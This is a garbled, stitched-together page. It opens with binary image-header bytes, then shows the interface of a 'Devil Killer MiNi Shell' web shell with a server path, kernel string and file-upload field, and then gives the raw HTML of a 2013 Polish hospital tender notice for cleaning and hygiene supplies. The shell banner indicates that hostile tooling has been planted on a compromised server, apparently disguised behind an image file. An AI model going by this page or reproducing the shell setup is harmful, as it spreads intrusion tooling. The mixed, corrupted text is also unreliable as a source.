JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131204/261079-N-2013.html

<p class="kh_header"><b>Ełk: Numer sprawy: 44/2013-DZP/PNO. Nazwa zadania: Dostawa środków czystości, materiałów i drobnego sprzętu do utrzymania higieny oraz worków na odpady.</b><br>
<b>Numer ogłoszenia: 261079 - 2013; data zamieszczenia: 04.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Kościuszki 30, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6219803, faks 087 6219807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.108spzoz.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Numer sprawy: 44/2013-DZP/PNO. Nazwa zadania: Dostawa środków czystości, materiałów i drobnego sprzętu do utrzymania higieny oraz worków na odpady..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę wymienionych w niniejszej specyfikacji części zamówienia - zadania od 1 do 8. 
2.Każdy z wykonawców może złożyć ofertę na wybrane przez siebie zadanie lub zadania, jednak nie więcej niż dopuszczalna liczba zadań.
3.Opis przedmiotu zamówienia
Zamówienie obejmuje 9 Zadań.
Przedmioty dostawy zamieszczone w ofercie powinny posiadać dokładny i czytelny opis przedmiotu zamówienia na opakowaniu oraz stosowne certyfikaty lub atesty dopuszczające 
ich stosowanie w służbie zdrowia zgodnie z polskim prawem oraz prawem Unii Europejskiej (powinny odpowiadać określonym normom lub specyfikacjom technicznym, posiadać aktualne świadectwo dopuszczenia do obrotu oferowanych środków wymagane prawem).
Przedmioty dostawy zamieszczone w ofercie powinny być bezpieczne w użyciu dla pacjentów oraz dla personelu.
Oznakowanie dostarczonych wyrobów, instrukcje użytkowania, opis wyrobu, etykiety (oryginalne) muszą być sporządzone w języku polskim.

Zamawiający zastrzega sobie prawo zakupu mniejszych ilości towaru niż podane  w Załącznikach Nr 2.

Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno  eksploatacyjno  użytkowych nie gorszych niż , podane w opisie przedmiotu zamówienia. Podstawa prawna: art. 29 ust. 3 Ustawy Prawo Zamówień Publicznych.

ZADANIE NR 1 - ŚRODKI CZYSTOŚCI

1Środek do mycia lodówek umożliwiający mycie chłodni bez konieczności rozmrażania, wymagany dobry efekt w tem.-30 C  butelka po 1 l L 6
2Łagodny środek czyszczący zawierający alkohol etylowy i kwasy sulfonowe pH9,5. Nadaje się do stosowania na wszystkie powierzchnie również ponad podłogą (PCV, linoleum, tworzywa sztuczne, szkło)jak i mycia maszynowego, stężenie robocze 0,25%, 0,75ml. Wymagane urządzenia naścienne dozujące w ilości 12 szt. karnister po 10 l L 500
3Uniwersalny środek do czyszczenia łazienek i sanitariatów pH0,4,posiadający konsystencję żelu, szybko i skutecznie usuwający wszystkie zanieczyszczenia typowe dla łazienek i sanitariatów, usuwa kamień i rdzę, stosowanie: zabrudzenia normalne 2-3 dozowania (10-20 ml. na 10 litrów wody, zabrudzenia silne roztwór stężony lub czysty koncentrat. Wymagane urządzenia naścienne dozujące w ilości 12 szt. karnister po 10 l L 600
4Środek  do pielęgnacji stali  nierdzewnej, szybki i skutecznie usuwający zabrudzenia np., odciski palców i zamazy, nadający połysk i nie pozostawiający tłustych powłok pH6-7, nie zawiera skład. szorujących, zastosowanie: windy, urządzenia kuchni butelka po 500 ml L 65
5Środek do gruntownego mycia wodoodpornych wykładzin podłogowych  z wosków  i polimerów karnister po 10 l L 120
6 Środek do pielęgnacji podłóg - dyspersja pielęgnacyjna odporna na działanie środków dezynfekcyjnych do zastosowania w obszarach szczególnych wymaganiach higienicznych tj., blok operacyjny, gabinety , zabiegowe. wartość pH9, sposób użycia 2-3 krotnie nanieść na uprzednio gruntownie wyczyszczoną podłogę.  karnister po 10 l  L 250
7Uniwersalny środek czyszczący ,nadaje się czyszczenia  odpornych na działanie wody powierzchni, bez trudu usuwa tłuszcz, oleje, i inne zabrudzenia, szczególnie przydatny w pomieszczeniach kuchni żywienia zbiorowego, nie szkodzi w środowisku ,posiada atest PZH, stosowanie  roztwór 0.5-1 % (40-80 ml. na 8 litrów wody) może być stosowany do zmywania ręcznego jak i w automatach czyszczących, pH 10,5-11. Wymagane urządzenia naścienne dozujące w ilości 1szt. karnister po 10 l L 120
8 Odświeżacz w sprayu do łazienki, zapach kwiatowy po 400 ml szt.20
9Środek do mycia podłóg, szybko i skutecznie usuwa zanieczyszczenia wszelkiego rodzaju, substancje natłuszczające, nadaje się również  do powierzchni pielęgnowanych emulsjami, zapobiega ślizganiu, sposób użycia: roztwór 1-2 % (100-200 ml. preparatu na 10 l roztworu roboczego ). Wymagane urządzenia naścienne dozujące w ilości 12 szt.karnister po 10 l L 1020
10 Płyn do mycia naczyń - środek myjący do ręcznego zmywania naczyń, pozytywnie przetestowane działanie na skórę rąk,  karnister po 5 l L 325
11Mydło w płynie  do mycia rąk o delikatnym zapachu, pH neutralne, przebadane dermatologicznie do dozowników, karnister po 5 l L 920
12Zagęszczony środek do dezynfekcji nawierzchni ,posadzek podłogowych i urządzeń  kuchennych właściwościach bakterio-i grzybobójczych  miejscach przygotowania posiłków,  postać bezbarwny gęsty płyn, karnister po 5 l L 160
13Zagęszczony środek do dezynfekcji nawierzchni ,posadzek podłogowych i urządzeń  kuchennych właściwościach bakterio-i grzybobójczych  miejscach przygotowania posiłków,  postać bezbarwny gęsty płyn, butelka po 1 l L 125
14Mleczko do szorowania powierzchni, szczególna zdolność rozpuszczania brudu i tłuszczu .zawierający aktywny tlen, ph 10-10,8 butelka po 500 ml L 220
15 Środek do rozpuszczania osadów wapniowych w wyparzarkach kuchennych,  butelka po 1 l  L 62
16 Bezwoskowy spray do mebli drewnianych, czyszczący, pielęgnujący, nadający połysk - nie gorszy niż PRONTO FUNITURE POLISH  butelka po 400ML SZT 20
17 Spray do czyszczenia mebli biurowych typu biurka, szafy, regały  po 400 ml SZT 62
18Płyn czyszcząco - dezynfekujący do WC zapobiegający powstawaniu osadów, zanieczyszczeń, zwalczający drobnoustroje - nie gorszy niż Domestos butelka po 1,25 l L 70
19Płyn do czyszczenia szyb z spryskiwaczem po 500 ml SZT 1030
20 Żel do czyszczenia urządzeń sanitarnych w toaletach WC o wartości pH ok.2,2  butelka po 1 l L 126
21 Środek do usuwania zapieczonego tłuszczu w piekarnikach (piec konwekcyjny),  po 1 l L 12
22 Pasta do zabrudzeń długotrwałych, skutecznie usuwająca naloty rdzy, kamienia i kamienia wodnego. opakowanie po 250 g SZT 500
23 Środek do usuwania kamienia i rdzy,  butelka po 1 l L 20
24 Tabletki do zmywarki np. Calgonit   po 56 tabletek OP 143
25 Kostka do wc 40 g SZT 64
26 Mydło kostka  100 g SZT 200
27 Ekologiczny preparat do szamb np..Biosanit 500 g SZT 1
28 Proszek do udrażniania rur 500 g SZT 10
29 Nabłyszczacz do naczyń do zmywarki profesjonalny karnister po 5 l L 40
30 Płyn myjący profesjonalny do zmywarki gastronomicznej karnister po 5 l L 120
31 Sól do zmywarek profesjonalnych opakowanie 10 kg opakowanie po 10 kg KG 100
32 Sól gruboziarnista Calgonit opakowanie 1,5 kg opak.1,50 kg OP 20


UWAGA: Warunki dodatkowe
1 Zamawiający wymaga do pozycji 2, 3, 7, 9 niniejszego formularza cenowego urządzeń dozujących ściennych - dozowniki w ilości 12 szt. System rozcieńczania detergentów przeznaczony do dozowania min. 3 środków chemicznych z kompletem zestawu końcówek, pozwalających na przygotowanie roztworów o stężeniu od 0,1%do13%. Wykonawca zobowiązuje się do użyczenia urządzeń dozujących na czas trwania umowy, przygotowujących automatycznie roztwór roboczy 
2 Preparaty opisane w w niniejszym Zadaniu w zależności do jakiej kategorii zostały zarejestrowane przez producentów muszą odpowiadać aktualnym przepisom obowiązującym na terenie RP., ze szczególnym uwzględnieniem:
- Ustawa o substancjach i preparatach chemicznych (Dz. U. Nr 11, poz. 84 z dnia 14.02.2001 wraz z późniejszymi rozporządzeniami, np.: wystawiania kart charakterystyki preparatów niebezpiecznych),
- Ustawa o opakowaniach i odpadach opakowaniowych (Dz. U. Nr 63, poz. 638 z dnia 22.06.2001 z późniejszymi zmianami i rozporządzeniami). Wymagana informacja o kodzie odpadu opakowaniowego oraz o sposobie postępowania z opakowaniami po produktach chemicznych. W przypadku opakowań po produktach niebezpiecznych ze znakiem ostrzegawczym N i T sprzedający zagwarantuje odbiór opakowań.
3 WYMAGANA ULOTKA INFORMACYJNA O KAŻDYM PRODUKCIE, SPOSOBIE JEGO UŻYCIA ORAZ SKŁADZIE CHEMICZNYM DO SKŁADANEJ OFERTY PRZETARGOWEJ. NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER POZYCJI PRZEDMIOTU ZAMÓWIENIU.
4 Wymagane przekazanie kart charakterystyki preparatów niebezpiecznych wraz z umową (z chwilą podpisania umowy)  w formie elektronicznej na płycie CD. Wykonawca zobowiązany będzie również w trakcie trwania umowy do powiadomienia Zamawiającego o wszelkich aktualizacjach informacji zawartych w kartach charakterystyki preparatów niebezpiecznych.

Za produkt równoważny uważa się produkt o gramaturze nie niższej niż podana w opisie przedmiotu zamówienia, posiadający te same walory organoleptyczne - zapach, barwa, konsystencja, zawierające w swoim składzie nie gorsze surowce użyte do produkcji, przeznaczony do uzyskania takich samych efektów z użytkowania. 

ZADANIE NR 2 - PAPIER TOALETOWY I RĘCZNIKI

1 Papier toaletowy - rolka duża ,1-warstwowy , szary, dł. wstęgi - min.100mb, szer. wstęgi-10cm, śr.-6 cm SZT 2000
2 Papier toaletowy - rolka standardowa ,1 warstwowy, szary, dł. wstęgi - min. 36mb, szer. wstęgi 10cm.,śr. tulei.- 3,5-4cm, SZT 2900
3 Ręczniki papierowe ZZ,1-warstwowy,szer. iska min. 23 cm, dł. listka - min. 25 cm, w kartonach po 4000 szt. listków, kolor zielony, KARTON 210
4 Ręczniki papierowe rolka kuchenna 23 cm.,2-warstwowe, kolor biały, min 16 mb,  SZT 3800
5 Papier toaletowy - rolka standardowa, 2-warstwowy, kolorowy, ilość listków - min. 200 SZT 150

UWAGA: Warunki dodatkowe
1 WYMAGANA ULOTKA INFORMACYJNA O KAŻDYM PRODUKCIE, DO SKŁADANEJ OFERTY PRZETARGOWEJ. NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER POZYCJI PRZEDMIOTU ZAMÓWIENIU.


ZADANIE NR 3 - WORKI FOLIOWE NA ODPADY

1 Worki foliowe na odpady, wymiary 35 l. hd, Kolor - niebieski rolki po 50 szt. ROLKA 1200
2 Worki foliowe na odpady, wymiar 60 l, hd, Kolor niebieski rolki po 50 szt. ROLKA 15
3 Worki foliowe na odpady, wymiar 120 l. id, Kolor niebieski rolki po 25 szt. ROLKA 1200
4Rękawice latexowe jednorazowe, Kolor żółty Rozmiar - S po 100 szt.  OP. 100
5Rękawice latexowe jednorazowe, Kolor żółty Rozmiar - M   po 100 szt. OP. 135
6Worki foliowe na odpady medyczne, wymiar 35l. hd,do spalania kolor czerwony rolki po 50 szt. ROLKA 600
7 Worki foliowe na odpady, wymiar 240 l. id,  Kolor czarny lub niebieski rolki po 10 szt. ROLKA 20
8 Worki foliowe na odpady medyczne; Wymiar 120 l, id, do spalania, Kolor czerwony rolki po 25 szt. ROLKA 1000
9 Worki foliowe na odpady medyczne, Wymiar 60 l. hd,  Kolor czerwony do  spalania  rolki po 50 szt. ROLKA 15
10Rękawice jednorazowe foliowepo 100 szt. OP.6
11Rękawice ochronne bawełniane 5-palcoweparaPARA20
12Worki foliowe n a odpady med. 35 l, hd, kolor żółty do spalaniarolki po 50 szt.ROLKA150
13Worki foliowe na odpady med.120 l, id, kolor żółty do spalaniarolki po 25 szt.ROLKA100


ZADANIE NR 4 - URZĄDZENIA DO SPRZĄTANIA

1Stelaż do mopa płaskiego kieszeniowego, ściskowy uchwyt do kija z zatrzaskiem, łatwy w nożnej obsłudze, szerokość 40 cmSZT70
2MOP nakładka  kieszeniowo-taśmowy 40 cm. Bawełniany,SZT 1010
3Szczotka do sedesu z pojemnikiemSZT 52
4Szufelka do śmieci + zmiotka SZT 25
5Kij drewniany 140 cm SZT 20
6Szczotka  do kurzu z mikrofibrą SZt 30
7Szczotka do szorowania ręcznego duża z uchwytem SZT 26
8Szczotka do zamiatania 28,5 cm, drewniana + kij drewniany , włosie mieszane SZT 40
9Szczotka ryżowa 22 cm + kij Drewniana ,kij drewniany 120cm. SZT 15
10Zestaw do mycia okien. Uchwyt do mycia ,nakładka do mycia, ściągaczka SZT 34
11Kij aluminiowy do nakładek na mop teleskopowy 3m (2-łącznikowy) SZT 20
12Ściereczki z mikrofazy 40x40. Trzy kolory SZT 1080
13Gąbka garnkowa do szorowania 7x15cm SZT 25
14Wiadro do mopa 14 l z wyciskaczem SZT 7
15Wiadro plastikowe 16 l. z przykrywką SZT. 15
16Szmaty do podłogi bawełniane 60x80  SZT. 50
17Druciak spiralny netinox duży SZT. 80
18Zmywak Stella A-5 OP 48
19Tablica ostrzegawcza z napisem UWAGA ŚLISKO  SZT. 10
20Ścierka prima jak bawełna A-10 maxi OP 12
21MOP sznurkowy bawełniany długi OP 10
22Worki do odkurzacza NUMATIC NVH 180 RSV a-10 szt. OP 10

ZADANIE NR 5 - ŚRODKI PIORĄCE

 
1Proszek biały zwykły (kolor, biały),   po 20 kg KG  2880
2Sól tabletkowana, opakowanie (NaCl)  po 25 kg KG 950
3Wybielacz do tkanin np. OXYGENOL,  karnister po 30 kg KARNISTER 2
4Płynny środek powierzchniowo-czynny do usuwania naturalnych zabrudzeń olejowych i tłuszczowych np. DERMASIL PLUS,  karnister po 20 kg KARNISTER 2
5Środek do dezynfekcji bielizny, np. OZONIT,  karnister po 20 kg KARNISTER 2
6Płyn do płukania tkanin karnister po 4 l L 150
7Płyn do odplamiania   po 1 l. L 30
8Pasta BHP po 0,5 kg KG 20
9Wybielacz  karnister po 5 l KARNISTER 8
10Płyn do prania    po 5 l KARNISTER 24
11Płyn Ludwik karnister po 5 l KARNISTER 18

UWAGA: Warunki dodatkowe 
1 Preparaty opisane w w niniejszym Zadaniu w zależności do jakiej kategorii zostały zarejestrowane przez producentów muszą odpowiadać aktualnym przepisom obowiązującym na terenie RP., ze szczególnym uwzględnieniem:
- Ustawa o substancjach i preparatach chemicznych (Dz. U. Nr 11, poz. 84 z dnia 14.02.2001 wraz z późniejszymi rozporządzeniami, np.: wystawiania kart charakterystyki preparatów niebezpiecznych),
- Ustawa o opakowaniach i odpadach opakowaniowych (Dz. U. Nr 63, poz. 638 z dnia 22.06.2001 z późniejszymi zmianami i rozporządzeniami). Wymagana informacja o kodzie odpadu opakowaniowego oraz o sposobie postępowania z opakowaniami po produktach chemicznych. W przypadku opakowań po produktach niebezpiecznych ze znakiem ostrzegawczym N i T sprzedający zagwarantuje odbiór opakowań.
2 Wymagane przekazanie kart charakterystyki preparatów niebezpiecznych wraz z umową (z chwilą podpisania umowy)  w formie elektronicznej na płycie CD. Wykonawca zobowiązany będzie również w trakcie trwania umowy do powiadomienia Zamawiającego o wszelkich aktualizacjach informacji zawartych w kartach charakterystyki preparatów niebezpiecznych.
3 WYMAGANA ULOTKA INFORMACYJNA O KAŻDYM PRODUKCIE, SPOSOBIE JEGO UŻYCIA ORAZ SKŁADZIE CHEMICZNYM DO SKŁADANEJ OFERTY PRZETARGOWEJ. NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER POZYCJI PRZEDMIOTU ZAMÓWIENIU.
4 Wymagane przekazanie kart charakterystyki preparatów niebezpiecznych wraz z umową (z chwilą podpisania umowy) w formie elektronicznej na płycie CD. Wykonawca zobowiązany będzie również w trakcie trwania umowy do powiadomienia Zamawiającego o wszelkich aktualizacjach informacji zawartych w kartach charakterystyki preparatów niebezpiecznych.

Za produkt równoważny uważa się produkt o gramaturze nie niższej niż podana w opisie przedmiotu zamówienia, posiadający te same walory organoleptyczne - zapach, barwa, konsystencja, zawierające w swoim składzie nie gorsze surowce użyte do produkcji, przeznaczony do uzyskania takich samych efektów z użytkowania. 

ZADANIE NR 6 - WÓZKI DO SPRZĄTANIA I DEZYNFEKCJI

 
1 Wózek do sprzątania i dezynfekcji:
- wiadro 24L
- wiadro 16L
- wyciskarka doczołowa (boczny odpływ wody)
- 2 kuwety 10L
- 2 wiaderka 6L
- uchwyt na worek 2 x 70L SZT 5
2 Kosz na odpady uchylny 15 l SZT 35
3 Kosz na odpady 100 l na kółkach, z pokrywą, z tworzywa sztucznego, SZT 10
4 Dozownik do mydła łokciowy 500 ml. Aluminiowy SZT 50
5 Dozownik do ręczników skład. ZZ z tworzywa sztucznego, wielkość listka 25 x 23 cm SZT 30

UWAGA: Warunki dodatkowe 
1 WYMAGANA ULOTKA INFORMACYJNA O KAŻDYM PRODUKCIE, DO SKŁADANEJ OFERTY PRZETARGOWEJ. NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER POZYCJI PRZEDMIOTU ZAMÓWIENIU.


ZADANIE NR 7 - ASORTYMENT JEDNORAZOWY (KUBECZKI SZTUĆCE TALERZE)

1 Torebki foliowe do żywności HDPE 22x26 1000 szt. OP 8
2 Torebki foliowe do żywności HDPE 26x35 1000 szt. OP 8
3 Kubki jednorazowe do ciepłego pojemność 0,200 l. 100 szt. OP 15
4Kubki jednorazowe, pojemność 0,200 l. 100 szt. OP 15
5Talerz jednorazowy płaski 100 szt.  OP 30
6Flaczarka jednorazowa, pojemność 0,300 l. 100 szt. OP 30
7Widelec jednorazowy  100 szt. OP 20
8Łyżka jednorazowa  100 szt. OP 20
9Nóż jednorazowy  100 szt. OP 20
10Łyżeczka jednorazowa  100 szt. OP 4
11Serwetki gastronomiczne białe 500 szt. OP 40
12Talerz jednorazowy deserowy 100 szt. OP 4

ZADANIE NR 8 - DROBNY SPRZĘT GOSPODARCZY

1Grabie plastikowe  proste do liści  SZT 4
2Łopata do śniegu PCV wzmocniona, szeroka z trzonkiem SZT 5
3Łopata do śniegu - sklejka SZT 5
4Szpadel prosty metalowy z trzonkiem SZT 2
5Łopata węglowa z trzonkiem SZT 2
6Grabie plastikowe wachlarzowe SZT 4
7Szczotka do zamiatania chodników szer.40-50 cm z trzonkiem SZT 5
8Miotły brzozowe SZT 100.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.76.00.00-5, 33.76.10.00-2, 33.76.30.00-6, 18.93.00.00-7, 39.22.40.00-8, 39.83.10.00-6, 39.22.21.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - Załącznik Nr 1 do SIWZ
2) Formularze cenowe w zakresie wybranych przez wykonawcę zadań od 1 do 8 - wypełnione i podpisane przez wykonawcę - Załącznik Nr 2 do SIWZ
3) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - Załącznik Nr 3 do SIWZ
4) Dokumenty potwierdzające posiadanie uprawnień  pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
